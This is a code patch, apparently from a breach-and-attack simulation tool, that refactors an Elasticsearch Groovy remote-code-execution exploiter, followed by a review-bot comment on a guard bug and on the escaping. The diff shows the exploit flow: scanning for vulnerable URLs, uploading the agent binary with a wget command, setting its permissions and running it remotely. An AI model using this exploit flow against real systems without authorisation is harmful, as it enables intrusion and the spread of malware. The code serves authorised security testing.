From 76523e7379ce4652f77ecca478ba958c2aba5670 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Sat, 18 Aug 2018 16:49:33 +0300
Subject: [PATCH] Refactored elastic for latest framework changes
---
 infection_monkey/exploit/elasticgroovy.py | 28 +++++++------------
 infection_monkey/network/mssql_fingerprint.py | 2 --
 2 files changed, 10 insertions(+), 20 deletions(-)
diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py
index 51531957b..73fe359a5 100644
--- a/infection_monkey/exploit/elasticgroovy.py
+++ b/infection_monkey/exploit/elasticgroovy.py
@@ -8,11 +8,9 @@ import json
 import logging
 import requests
 from network.elasticfinger import ES_SERVICE, ES_PORT
-from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 from exploit.web_rce import WebRCE
-from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
+from model import WGET_HTTP_UPLOAD
-import copy
 import re
 __author__ = 'danielg'
@@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE): if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - # We need a reference to the exploiter for WebRCE framework to use - exploiter = self.exploit # Build url from host and elastic port(not https) - urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) vulnerable_urls = [] for url in urls: - if WebRCE.check_if_exploitable(exploiter, url): + if self.check_if_exploitable(url): vulnerable_urls.append(url) self._exploit_info['vulnerable_urls'] = vulnerable_urls if not vulnerable_urls: return False - # Extra escaping required: - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" - config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" - - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): + if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True - if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + if not self.set_host_arch(vulnerable_urls[0]): return False commands = {'windows': self.RDP_CMDLINE_HTTP, 'linux': WGET_HTTP_UPLOAD} - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) + data = self.upload_monkey(vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' - if data is not False and data['response'] == False: + if data is not False and data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], 
exploiter, data['path'], True) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: return False return True def exploit(self, url, command): + command = re.sub(r"\\", r"\\\\\\\\", command) payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index ea4370d24..f973f3d87 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - # TODO remove auto-return - return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout
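Review bot: The rewritten upload guard `if data is not False and data['response'] is False:` still lets a `False` return from `upload_monkey` fall through to `data['path']` two lines later, where subscripting a bool raises `TypeError` instead of the method returning `False`; if `upload_monkey` can return `False` (the guard itself implies it can), the condition should read `if data is False or data['response'] is False:`. The new escaping line in `exploit`, `command = re.sub(r"\\", r"\\\\\\\\", command)`, replaces the removed deepcopy of the dropper paths but carries no explanation of the count, so a comment such as `# every backslash becomes four: the command is unescaped once by the JSON body and presumably once more by the Groovy string in JAVA_CMD (re.sub halves the raw repl, hence eight)` would stop the next maintainer from "fixing" it. The body of `exploit` continues past the end of the hunk.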